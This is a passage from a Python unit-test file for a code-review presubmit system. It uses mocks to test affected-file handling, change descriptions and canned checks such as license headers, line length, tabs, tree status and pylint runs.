presubmit.gclient_utils.FileRead(f_path, 'rU').AndReturn('whatever\ncookie') presubmit.scm.SVN._CaptureInfo([path], self.fake_root_dir).AndReturn( {'URL': 'svn:/foo/foo/blat.cc'}) self.mox.ReplayAll() af = presubmit.SvnAffectedFile('foo/blat.cc', 'M', self.fake_root_dir, None) self.assertEquals('svn:/foo/foo/blat.cc', af.ServerPath()) self.assertEquals(presubmit.normpath('foo/blat.cc'), af.LocalPath()) self.assertEquals('M', af.Action()) self.assertEquals(['whatever', 'cookie'], af.NewContents()) def testAffectedFileNotExists(self): notfound = 'notfound.cc' f_notfound = presubmit.os.path.join(self.fake_root_dir, notfound) presubmit.os.path.exists(f_notfound).AndReturn(False) presubmit.gclient_utils.FileRead(f_notfound, 'rU').AndRaise(IOError) self.mox.ReplayAll() af = presubmit.AffectedFile(notfound, 'A', self.fake_root_dir, None) self.assertEquals('', af.ServerPath()) self.assertEquals([], af.NewContents()) def testProperty(self): presubmit.scm.SVN.GetFileProperty( 'foo.cc', 'svn:secret-property', self.fake_root_dir ).AndReturn('secret-property-value') self.mox.ReplayAll() affected_file = presubmit.SvnAffectedFile('foo.cc', 'A', self.fake_root_dir, None) # Verify cache coherency. self.assertEquals('secret-property-value', affected_file.Property('svn:secret-property')) self.assertEquals('secret-property-value', affected_file.Property('svn:secret-property')) def testIsDirectoryNotExists(self): filename = 'foo.cc' f_filename = presubmit.os.path.join(self.fake_root_dir, filename) presubmit.os.path.exists(f_filename).AndReturn(False) presubmit.scm.SVN._CaptureInfo([filename], self.fake_root_dir).AndReturn({}) self.mox.ReplayAll() affected_file = presubmit.SvnAffectedFile(filename, 'A', self.fake_root_dir, None) # Verify cache coherency. self.failIf(affected_file.IsDirectory()) self.failIf(affected_file.IsDirectory()) def testIsDirectory(self): filename = 'foo.cc' f_filename = presubmit.os.path.join(self.fake_root_dir, filename) presubmit.os.path.exists(f_filename).AndReturn(True) presubmit.os.path.isdir(f_filename).AndReturn(True) self.mox.ReplayAll() affected_file = presubmit.SvnAffectedFile(filename, 'A', self.fake_root_dir, None) # Verify cache coherency. self.failUnless(affected_file.IsDirectory()) self.failUnless(affected_file.IsDirectory()) def testIsTextFile(self): files = [ presubmit.SvnAffectedFile('foo/blat.txt', 'M', self.fake_root_dir, None), presubmit.SvnAffectedFile('foo/binary.blob', 'M', self.fake_root_dir, None), presubmit.SvnAffectedFile('blat/flop.txt', 'D', self.fake_root_dir, None) ] blat = presubmit.os.path.join('foo', 'blat.txt') blob = presubmit.os.path.join('foo', 'binary.blob') f_blat = presubmit.os.path.join(self.fake_root_dir, blat) f_blob = presubmit.os.path.join(self.fake_root_dir, blob) presubmit.os.path.exists(f_blat).AndReturn(True) presubmit.os.path.isdir(f_blat).AndReturn(False) presubmit.os.path.exists(f_blob).AndReturn(True) presubmit.os.path.isdir(f_blob).AndReturn(False) presubmit.scm.SVN.GetFileProperty(blat, 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GetFileProperty(blob, 'svn:mime-type', self.fake_root_dir ).AndReturn('application/octet-stream') self.mox.ReplayAll() output = filter(lambda x: x.IsTextFile(), files) self.assertEquals(1, len(output)) self.assertEquals(files[0], output[0]) class ChangeUnittest(PresubmitTestsBase): def testMembersChanged(self): members = [ 'AbsoluteLocalPaths', 'AffectedFiles', 'AffectedTextFiles', 'AllFiles', 'DescriptionText', 'FullDescriptionText', 'LocalPaths', 'Name', 'RepositoryRoot', 'RightHandSideLines', 'ServerPaths', 'SetDescriptionText', 'TAG_LINE_RE', 'author_email', 'issue', 'patchset', 'scm', 'tags', ] # If this test fails, you should add the relevant test. self.mox.ReplayAll() change = presubmit.Change( 'foo', 'foo', self.fake_root_dir, [('M', 'AA')], 0, 0, 'foo') self.compareMembers(change, members) def testMembers(self): change = presubmit.Change( 'foo1', 'foo2\nDRU=ro', self.fake_root_dir, [('Y', 'AA')], 3, 5, 'foo3') self.assertEquals('foo1', change.Name()) self.assertEquals('foo2', change.DescriptionText()) self.assertEquals('foo3', change.author_email) self.assertEquals('ro', change.DRU) self.assertEquals(3, change.issue) self.assertEquals(5, change.patchset) self.assertEquals(self.fake_root_dir, change.RepositoryRoot()) self.assertEquals(1, len(change.AffectedFiles(include_dirs=True))) self.assertEquals('Y', change.AffectedFiles(include_dirs=True)[0].Action()) def testSetDescriptionText(self): change = presubmit.Change( '', 'foo\nDRU=ro', self.fake_root_dir, [], 3, 5, '') self.assertEquals('foo', change.DescriptionText()) self.assertEquals('foo\nDRU=ro', change.FullDescriptionText()) self.assertEquals('ro', change.DRU) change.SetDescriptionText('bar\nWHIZ=bang') self.assertEquals('bar', change.DescriptionText()) self.assertEquals('bar\nWHIZ=bang', change.FullDescriptionText()) self.assertEquals('bang', change.WHIZ) self.assertFalse(change.DRU) def CommHelper(input_api, cmd, ret=None, **kwargs): ret = ret or (('', None), 0) input_api.subprocess.communicate( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs ).AndReturn(ret) class CannedChecksUnittest(PresubmitTestsBase): """Tests presubmit_canned_checks.py.""" def MockInputApi(self, change, committing): # pylint: disable=R0201 input_api = self.mox.CreateMock(presubmit.InputApi) input_api.cStringIO = presubmit.cStringIO input_api.json = presubmit.json input_api.logging = logging input_api.os_listdir = self.mox.CreateMockAnything() input_api.os_walk = self.mox.CreateMockAnything() input_api.os_path = presubmit.os.path input_api.re = presubmit.re input_api.rietveld = self.mox.CreateMock(rietveld.Rietveld) input_api.traceback = presubmit.traceback input_api.urllib2 = self.mox.CreateMock(presubmit.urllib2) input_api.unittest = unittest input_api.subprocess = self.mox.CreateMock(subprocess) presubmit.subprocess = input_api.subprocess class fake_CalledProcessError(Exception): def __str__(self): return 'foo' input_api.subprocess.CalledProcessError = fake_CalledProcessError input_api.verbose = False input_api.change = change input_api.host_url = 'http://localhost' input_api.is_committing = committing input_api.tbr = False input_api.python_executable = 'pyyyyython' input_api.platform = sys.platform input_api.cpu_count = 2 input_api.time = time input_api.canned_checks = presubmit_canned_checks input_api.Command = presubmit.CommandData input_api.RunTests = functools.partial( presubmit.InputApi.RunTests, input_api) return input_api def testMembersChanged(self): self.mox.ReplayAll() members = [ 'DEFAULT_LINT_FILTERS', 'CheckBuildbotPendingBuilds', 'CheckChangeHasBugField', 'CheckChangeHasDescription', 'CheckChangeHasNoStrayWhitespace', 'CheckChangeHasOnlyOneEol', 'CheckChangeHasNoCR', 'CheckChangeHasNoCrAndHasOnlyOneEol', 'CheckChangeHasNoTabs', 'CheckChangeTodoHasOwner', 'CheckChangeHasQaField', 'CheckChangeHasTestedField', 'CheckChangeHasTestField', 'CheckChangeLintsClean', 'CheckChangeSvnEolStyle', 'CheckChangeWasUploaded', 'CheckDoNotSubmit', 'CheckDoNotSubmitInDescription', 'CheckDoNotSubmitInFiles', 'CheckLongLines', 'CheckTreeIsOpen', 'PanProjectChecks', 'CheckLicense', 'CheckOwners', 'CheckPatchFormatted', 'CheckGNFormatted', 'CheckRietveldTryJobExecution', 'CheckSingletonInHeaders', 'CheckSvnModifiedDirectories', 'CheckSvnForCommonMimeTypes', 'CheckSvnProperty', 'RunPythonUnitTests', 'RunPylint', 'RunUnitTests', 'RunUnitTestsInDirectory', 'GetPythonUnitTests', 'GetPylint', 'GetUnitTests', 'GetUnitTestsInDirectory', 'GetUnitTestsRecursively', ] # If this test fails, you should add the relevant test. self.compareMembers(presubmit_canned_checks, members) def DescriptionTest(self, check, description1, description2, error_type, committing): change1 = presubmit.Change( 'foo1', description1, self.fake_root_dir, None, 0, 0, None) input_api1 = self.MockInputApi(change1, committing) change2 = presubmit.Change( 'foo2', description2, self.fake_root_dir, None, 0, 0, None) input_api2 = self.MockInputApi(change2, committing) self.mox.ReplayAll() results1 = check(input_api1, presubmit.OutputApi) self.assertEquals(results1, []) results2 = check(input_api2, presubmit.OutputApi) self.assertEquals(len(results2), 1) self.assertEquals(results2[0].__class__, error_type) def ContentTest(self, check, content1, content1_path, content2, content2_path, error_type): """Runs a test of a content-checking rule. Args: check: the check to run. content1: content which is expected to pass the check. content1_path: file path for content1. content2: content which is expected to fail the check. content2_path: file path for content2. error_type: the type of the error expected for content2. """ change1 = presubmit.Change( 'foo1', 'foo1\n', self.fake_root_dir, None, 0, 0, None) input_api1 = self.MockInputApi(change1, False) affected_file = self.mox.CreateMock(presubmit.SvnAffectedFile) input_api1.AffectedFiles( include_deletes=False, file_filter=mox.IgnoreArg()).AndReturn([affected_file]) affected_file.LocalPath().AndReturn(content1_path) affected_file.NewContents().AndReturn([ 'afoo', content1, 'bfoo', 'cfoo', 'dfoo']) change2 = presubmit.Change( 'foo2', 'foo2\n', self.fake_root_dir, None, 0, 0, None) input_api2 = self.MockInputApi(change2, False) input_api2.AffectedFiles( include_deletes=False, file_filter=mox.IgnoreArg()).AndReturn([affected_file]) affected_file.LocalPath().AndReturn(content2_path) affected_file.NewContents().AndReturn([ 'dfoo', content2, 'efoo', 'ffoo', 'gfoo']) # It falls back to ChangedContents when there is a failure. This is an # optimization since NewContents() is much faster to execute than # ChangedContents(). affected_file.ChangedContents().AndReturn([ (42, content2), (43, 'hfoo'), (23, 'ifoo')]) affected_file.LocalPath().AndReturn('foo.cc') self.mox.ReplayAll() results1 = check(input_api1, presubmit.OutputApi, None) self.assertEquals(results1, []) results2 = check(input_api2, presubmit.OutputApi, None) self.assertEquals(len(results2), 1) self.assertEquals(results2[0].__class__, error_type) def ReadFileTest(self, check, content1, content2, error_type): change1 = presubmit.Change( 'foo1', 'foo1\n', self.fake_root_dir, None, 0, 0, None) input_api1 = self.MockInputApi(change1, False) affected_file1 = self.mox.CreateMock(presubmit.SvnAffectedFile) input_api1.AffectedSourceFiles(None).AndReturn([affected_file1]) input_api1.ReadFile(affected_file1, 'rb').AndReturn(content1) change2 = presubmit.Change( 'foo2', 'foo2\n', self.fake_root_dir, None, 0, 0, None) input_api2 = self.MockInputApi(change2, False) affected_file2 = self.mox.CreateMock(presubmit.SvnAffectedFile) input_api2.AffectedSourceFiles(None).AndReturn([affected_file2]) input_api2.ReadFile(affected_file2, 'rb').AndReturn(content2) affected_file2.LocalPath().AndReturn('bar.cc') self.mox.ReplayAll() results = check(input_api1, presubmit.OutputApi) self.assertEquals(results, []) results2 = check(input_api2, presubmit.OutputApi) self.assertEquals(len(results2), 1) self.assertEquals(results2[0].__class__, error_type) def SvnPropertyTest(self, check, property_name, value1, value2, committing, error_type, use_source_file): change1 = presubmit.SvnChange( 'mychange', '', self.fake_root_dir, [], 0, 0, None) input_api1 = self.MockInputApi(change1, committing) files1 = [ presubmit.SvnAffectedFile('foo/bar.cc', 'A', self.fake_root_dir, None), presubmit.SvnAffectedFile('foo.cc', 'M', self.fake_root_dir, None), ] if use_source_file: input_api1.AffectedSourceFiles(None).AndReturn(files1) else: input_api1.AffectedFiles(include_deletes=False).AndReturn(files1) presubmit.scm.SVN.GetFileProperty( presubmit.normpath('foo/bar.cc'), property_name, self.fake_root_dir ).AndReturn(value1) presubmit.scm.SVN.GetFileProperty( presubmit.normpath('foo.cc'), property_name, self.fake_root_dir ).AndReturn(value1) change2 = presubmit.SvnChange( 'mychange', '', self.fake_root_dir, [], 0, 0, None) input_api2 = self.MockInputApi(change2, committing) files2 = [ presubmit.SvnAffectedFile('foo/bar.cc', 'A', self.fake_root_dir, None), presubmit.SvnAffectedFile('foo.cc', 'M', self.fake_root_dir, None), ] if use_source_file: input_api2.AffectedSourceFiles(None).AndReturn(files2) else: input_api2.AffectedFiles(include_deletes=False).AndReturn(files2) presubmit.scm.SVN.GetFileProperty( presubmit.normpath('foo/bar.cc'), property_name, self.fake_root_dir ).AndReturn(value2) presubmit.scm.SVN.GetFileProperty( presubmit.normpath('foo.cc'), property_name, self.fake_root_dir ).AndReturn(value2) self.mox.ReplayAll() results1 = check(input_api1, presubmit.OutputApi, None) self.assertEquals(results1, []) results2 = check(input_api2, presubmit.OutputApi, None) self.assertEquals(len(results2), 1) self.assertEquals(results2[0].__class__, error_type) def testCannedCheckChangeHasBugField(self): self.DescriptionTest(presubmit_canned_checks.CheckChangeHasBugField, 'Foo\nBUG=1234', 'Foo\n', presubmit.OutputApi.PresubmitNotifyResult, False) def testCheckChangeHasDescription(self): self.DescriptionTest(presubmit_canned_checks.CheckChangeHasDescription, 'Bleh', '', presubmit.OutputApi.PresubmitNotifyResult, False) self.mox.VerifyAll() self.DescriptionTest(presubmit_canned_checks.CheckChangeHasDescription, 'Bleh', '', presubmit.OutputApi.PresubmitError, True) def testCannedCheckChangeHasTestField(self): self.DescriptionTest(presubmit_canned_checks.CheckChangeHasTestField, 'Foo\nTEST=did some stuff', 'Foo\n', presubmit.OutputApi.PresubmitNotifyResult, False) def testCannedCheckChangeHasTestedField(self): self.DescriptionTest(presubmit_canned_checks.CheckChangeHasTestedField, 'Foo\nTESTED=did some stuff', 'Foo\n', presubmit.OutputApi.PresubmitError, False) def testCannedCheckChangeHasQAField(self): self.DescriptionTest(presubmit_canned_checks.CheckChangeHasQaField, 'Foo\nQA=BSOD your machine', 'Foo\n', presubmit.OutputApi.PresubmitError, False) def testCannedCheckDoNotSubmitInDescription(self): self.DescriptionTest(presubmit_canned_checks.CheckDoNotSubmitInDescription, 'Foo\nDO NOTSUBMIT', 'Foo\nDO NOT ' + 'SUBMIT', presubmit.OutputApi.PresubmitError, False) def testCannedCheckDoNotSubmitInFiles(self): self.ContentTest( lambda x,y,z: presubmit_canned_checks.CheckDoNotSubmitInFiles(x, y), 'DO NOTSUBMIT', None, 'DO NOT ' + 'SUBMIT', None, presubmit.OutputApi.PresubmitError) def testCheckChangeHasNoStrayWhitespace(self): self.ContentTest( lambda x,y,z: presubmit_canned_checks.CheckChangeHasNoStrayWhitespace(x, y), 'Foo', None, 'Foo ', None, presubmit.OutputApi.PresubmitPromptWarning) def testCheckChangeHasOnlyOneEol(self): self.ReadFileTest(presubmit_canned_checks.CheckChangeHasOnlyOneEol, "Hey!\nHo!\n", "Hey!\nHo!\n\n", presubmit.OutputApi.PresubmitPromptWarning) def testCheckChangeHasNoCR(self): self.ReadFileTest(presubmit_canned_checks.CheckChangeHasNoCR, "Hey!\nHo!\n", "Hey!\r\nHo!\r\n", presubmit.OutputApi.PresubmitPromptWarning) def testCheckChangeHasNoCrAndHasOnlyOneEol(self): self.ReadFileTest( presubmit_canned_checks.CheckChangeHasNoCrAndHasOnlyOneEol, "Hey!\nHo!\n", "Hey!\nHo!\n\n", presubmit.OutputApi.PresubmitPromptWarning) self.mox.VerifyAll() self.ReadFileTest( presubmit_canned_checks.CheckChangeHasNoCrAndHasOnlyOneEol, "Hey!\nHo!\n", "Hey!\r\nHo!\r\n", presubmit.OutputApi.PresubmitPromptWarning) def testCheckChangeTodoHasOwner(self): self.ContentTest(presubmit_canned_checks.CheckChangeTodoHasOwner, "TODO(foo): bar", None, "TODO: bar", None, presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckChangeHasNoTabs(self): self.ContentTest(presubmit_canned_checks.CheckChangeHasNoTabs, 'blah blah', None, 'blah\tblah', None, presubmit.OutputApi.PresubmitPromptWarning) # Make sure makefiles are ignored. change1 = presubmit.Change( 'foo1', 'foo1\n', self.fake_root_dir, None, 0, 0, None) input_api1 = self.MockInputApi(change1, False) affected_file1 = self.mox.CreateMock(presubmit.SvnAffectedFile) affected_file1.LocalPath().AndReturn('foo.cc') affected_file2 = self.mox.CreateMock(presubmit.SvnAffectedFile) affected_file2.LocalPath().AndReturn('foo/Makefile') affected_file3 = self.mox.CreateMock(presubmit.SvnAffectedFile) affected_file3.LocalPath().AndReturn('makefile') # Only this one will trigger. affected_file4 = self.mox.CreateMock(presubmit.SvnAffectedFile) affected_file1.LocalPath().AndReturn('foo.cc') affected_file1.NewContents().AndReturn(['yo, ']) affected_file4.LocalPath().AndReturn('makefile.foo') affected_file4.LocalPath().AndReturn('makefile.foo') affected_file4.NewContents().AndReturn(['ye\t']) affected_file4.ChangedContents().AndReturn([(46, 'ye\t')]) affected_file4.LocalPath().AndReturn('makefile.foo') affected_files = (affected_file1, affected_file2, affected_file3, affected_file4) def test(include_dirs=False, include_deletes=True, file_filter=None): self.assertFalse(include_deletes) for x in affected_files: if file_filter(x): yield x # Override the mock of these functions. input_api1.FilterSourceFile = lambda x: x input_api1.AffectedFiles = test self.mox.ReplayAll() results1 = presubmit_canned_checks.CheckChangeHasNoTabs(input_api1, presubmit.OutputApi, None) self.assertEquals(len(results1), 1) self.assertEquals(results1[0].__class__, presubmit.OutputApi.PresubmitPromptWarning) self.assertEquals(results1[0]._long_text, 'makefile.foo:46') def testCannedCheckLongLines(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest(check, '0123456789', None, '01234567890', None, presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckJavaLongLines(self): check = lambda x, y, _: presubmit_canned_checks.CheckLongLines(x, y, 80) self.ContentTest(check, 'A ' * 50, 'foo.java', 'A ' * 50 + 'B', 'foo.java', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckSpecialJavaLongLines(self): check = lambda x, y, _: presubmit_canned_checks.CheckLongLines(x, y, 80) self.ContentTest(check, 'import ' + 'A ' * 150, 'foo.java', 'importSomething ' + 'A ' * 50, 'foo.java', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckObjCExceptionLongLines(self): check = lambda x, y, _: presubmit_canned_checks.CheckLongLines(x, y, 80) self.ContentTest(check, '#import ' + 'A ' * 150, 'foo.mm', 'import' + 'A ' * 150, 'foo.mm', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckMakefileLongLines(self): check = lambda x, y, _: presubmit_canned_checks.CheckLongLines(x, y, 80) self.ContentTest(check, 'A ' * 100, 'foo.mk', 'A ' * 100 + 'B', 'foo.mk', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckLongLinesLF(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest(check, '012345678\n', None, '0123456789\n', None, presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckCppExceptionLongLines(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest( check, '#if 56 89 12 45 9191919191919', 'foo.cc', '#nif 56 89 12 45 9191919191919', 'foo.cc', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckLongLinesHttp(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest( check, ' http:// 0 23 56', None, ' foob:// 0 23 56', None, presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckLongLinesFile(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest( check, ' file:// 0 23 56', None, ' foob:// 0 23 56', None, presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckLongLinesCssUrl(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest( check, ' url(some.png)', 'foo.css', ' url(some.png)', 'foo.cc', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckLongLinesLongSymbol(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest( check, ' TUP5D_LoNG_SY ', None, ' TUP5D_LoNG_SY5 ', None, presubmit.OutputApi.PresubmitPromptWarning) def testCheckChangeSvnEolStyleCommit(self): # Test CheckSvnProperty at the same time. self.SvnPropertyTest(presubmit_canned_checks.CheckChangeSvnEolStyle, 'svn:eol-style', 'LF', '', True, presubmit.OutputApi.PresubmitError, True) def testCheckChangeSvnEolStyleUpload(self): self.SvnPropertyTest(presubmit_canned_checks.CheckChangeSvnEolStyle, 'svn:eol-style', 'LF', '', False, presubmit.OutputApi.PresubmitNotifyResult, True) def _LicenseCheck(self, text, license_text, committing, expected_result, **kwargs): change = self.mox.CreateMock(presubmit.SvnChange) change.scm = 'svn' input_api = self.MockInputApi(change, committing) affected_file = self.mox.CreateMock(presubmit.SvnAffectedFile) input_api.AffectedSourceFiles(42).AndReturn([affected_file]) input_api.ReadFile(affected_file, 'rb').AndReturn(text) if expected_result: affected_file.LocalPath().AndReturn('bleh') self.mox.ReplayAll() result = presubmit_canned_checks.CheckLicense( input_api, presubmit.OutputApi, license_text, source_file_filter=42, **kwargs) if expected_result: self.assertEqual(len(result), 1) self.assertEqual(result[0].__class__, expected_result) else: self.assertEqual(result, []) def testCheckLicenseSuccess(self): text = ( "#!/bin/python\n" "# Copyright (c) 2037 Nobody.\n" "# All Rights Reserved.\n" "print 'foo'\n" ) license_text = ( r".*? Copyright \(c\) 2037 Nobody." "\n" r".*? All Rights Reserved\." "\n" ) self._LicenseCheck(text, license_text, True, None) def testCheckLicenseFailCommit(self): text = ( "#!/bin/python\n" "# Copyright (c) 2037 Nobody.\n" "# All Rights Reserved.\n" "print 'foo'\n" ) license_text = ( r".*? Copyright \(c\) 0007 Nobody." "\n" r".*? All Rights Reserved\." "\n" ) self._LicenseCheck(text, license_text, True, presubmit.OutputApi.PresubmitPromptWarning) def testCheckLicenseFailUpload(self): text = ( "#!/bin/python\n" "# Copyright (c) 2037 Nobody.\n" "# All Rights Reserved.\n" "print 'foo'\n" ) license_text = ( r".*? Copyright \(c\) 0007 Nobody." "\n" r".*? All Rights Reserved\." "\n" ) self._LicenseCheck(text, license_text, False, presubmit.OutputApi.PresubmitNotifyResult) def testCheckLicenseEmptySuccess(self): text = '' license_text = ( r".*? Copyright \(c\) 2037 Nobody." "\n" r".*? All Rights Reserved\." "\n" ) self._LicenseCheck(text, license_text, True, None, accept_empty_files=True) def testCannedCheckSvnAccidentalSubmission(self): modified_dir_file = 'foo/' accidental_submssion_file = 'foo/bar.cc' change = self.mox.CreateMock(presubmit.SvnChange) change.scm = 'svn' change.GetModifiedFiles().AndReturn([modified_dir_file]) change.GetAllModifiedFiles().AndReturn([modified_dir_file, accidental_submssion_file]) input_api = self.MockInputApi(change, True) affected_file = self.mox.CreateMock(presubmit.SvnAffectedFile) affected_file.Action().AndReturn('M') affected_file.IsDirectory().AndReturn(True) affected_file.AbsoluteLocalPath().AndReturn(accidental_submssion_file) affected_file.LocalPath().AndReturn(accidental_submssion_file) input_api.AffectedFiles(file_filter=None).AndReturn([affected_file]) self.mox.ReplayAll() check = presubmit_canned_checks.CheckSvnModifiedDirectories results = check(input_api, presubmit.OutputApi, None) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitPromptWarning) def testCheckSvnForCommonMimeTypes(self): self.mox.StubOutWithMock(presubmit_canned_checks, 'CheckSvnProperty') input_api = self.MockInputApi(None, False) output_api = presubmit.OutputApi(False) A = lambda x: presubmit.AffectedFile(x, 'M', self.fake_root_dir, None) files = [ A('a.pdf'), A('b.bmp'), A('c.gif'), A('d.png'), A('e.jpg'), A('f.jpe'), A('random'), A('g.jpeg'), A('h.ico'), ] input_api.AffectedFiles(include_deletes=False).AndReturn(files) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'application/pdf', [files[0]] ).AndReturn([1]) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'image/bmp', [files[1]] ).AndReturn([2]) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'image/gif', [files[2]] ).AndReturn([3]) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'image/png', [files[3]] ).AndReturn([4]) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'image/jpeg', [files[4], files[5], files[7]] ).AndReturn([5]) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'image/vnd.microsoft.icon', [files[8]]).AndReturn([6]) self.mox.ReplayAll() results = presubmit_canned_checks.CheckSvnForCommonMimeTypes( input_api, output_api) self.assertEquals(results, [1, 2, 3, 4, 5, 6]) def testCannedCheckTreeIsOpenOpen(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('url_to_open').AndReturn(connection) connection.read().AndReturn('The tree is open') connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckTreeIsOpen( input_api, presubmit.OutputApi, url='url_to_open', closed='.*closed.*') self.assertEquals(results, []) def testCannedCheckTreeIsOpenClosed(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('url_to_closed').AndReturn(connection) connection.read().AndReturn('Tree is closed for maintenance') connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckTreeIsOpen( input_api, presubmit.OutputApi, url='url_to_closed', closed='.*closed.*') self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitError) def testCannedCheckJsonTreeIsOpenOpen(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('url_to_open').AndReturn(connection) status = { 'can_commit_freely': True, 'general_state': 'open', 'message': 'The tree is open' } connection.read().AndReturn(input_api.json.dumps(status)) connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckTreeIsOpen( input_api, presubmit.OutputApi, json_url='url_to_open') self.assertEquals(results, []) def testCannedCheckJsonTreeIsOpenClosed(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('url_to_closed').AndReturn(connection) status = { 'can_commit_freely': False, 'general_state': 'closed', 'message': 'The tree is close', } connection.read().AndReturn(input_api.json.dumps(status)) connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckTreeIsOpen( input_api, presubmit.OutputApi, json_url='url_to_closed') self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitError) def testRunPythonUnitTestsNoTest(self): input_api = self.MockInputApi(None, False) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, []) self.assertEquals(results, []) def testRunPythonUnitTestsNonExistentUpload(self): input_api = self.MockInputApi(None, False) CommHelper(input_api, ['pyyyyython', '-m', '_non_existent_module'], ret=(('foo', None), 1), cwd=None, env=None) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, ['_non_existent_module']) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitNotifyResult) def testRunPythonUnitTestsNonExistentCommitting(self): input_api = self.MockInputApi(None, True) CommHelper(input_api, ['pyyyyython', '-m', '_non_existent_module'], ret=(('foo', None), 1), cwd=None, env=None) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, ['_non_existent_module']) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitError) def testRunPythonUnitTestsFailureUpload(self): input_api = self.MockInputApi(None, False) input_api.unittest = self.mox.CreateMock(unittest) input_api.cStringIO = self.mox.CreateMock(presubmit.cStringIO) CommHelper(input_api, ['pyyyyython', '-m', 'test_module'], ret=(('foo', None), 1), cwd=None, env=None) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, ['test_module']) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitNotifyResult) self.assertEquals('test_module (0.00s) failed\nfoo', results[0]._message) def testRunPythonUnitTestsFailureCommitting(self): input_api = self.MockInputApi(None, True) CommHelper(input_api, ['pyyyyython', '-m', 'test_module'], ret=(('foo', None), 1), cwd=None, env=None) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, ['test_module']) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitError) self.assertEquals('test_module (0.00s) failed\nfoo', results[0]._message) def testRunPythonUnitTestsSuccess(self): input_api = self.MockInputApi(None, False) input_api.cStringIO = self.mox.CreateMock(presubmit.cStringIO) input_api.unittest = self.mox.CreateMock(unittest) CommHelper(input_api, ['pyyyyython', '-m', 'test_module'], cwd=None, env=None) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, ['test_module']) self.assertEquals(len(results), 0) def testCannedRunPylint(self): input_api = self.MockInputApi(None, True) input_api.environ = self.mox.CreateMock(os.environ) input_api.environ.copy().AndReturn({}) input_api.AffectedSourceFiles(mox.IgnoreArg()).AndReturn(True) input_api.PresubmitLocalPath().AndReturn('/foo') input_api.PresubmitLocalPath().AndReturn('/foo') input_api.os_walk('/foo').AndReturn([('/foo', [], ['file1.py'])]) pylint = os.path.join(_ROOT, 'third_party', 'pylint.py') pylintrc = os.path.join(_ROOT, 'pylintrc') CommHelper(input_api, ['pyyyyython', pylint, '--args-on-stdin'], env=mox.IgnoreArg(), stdin= '--rcfile=%s\n--disable=cyclic-import\n--jobs=2\nfile1.py' % pylintrc) CommHelper(input_api, ['pyyyyython', pylint, '--args-on-stdin'], env=mox.IgnoreArg(), stdin= '--rcfile=%s\n--disable=all\n--enable=cyclic-import\nfile1.py' % pylintrc) self.mox.ReplayAll() results = presubmit_canned_checks.RunPylint( input_api, presubmit.OutputApi) self.assertEquals([], results) self.checkstdout('') def testCheckBuildbotPendingBuildsBad(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('uurl').AndReturn(connection) connection.read().AndReturn('foo') connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckBuildbotPendingBuilds( input_api, presubmit.OutputApi, 'uurl', 2, ('foo')) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitNotifyResult) def testCheckBuildbotPendingBuildsGood(self): input_api = 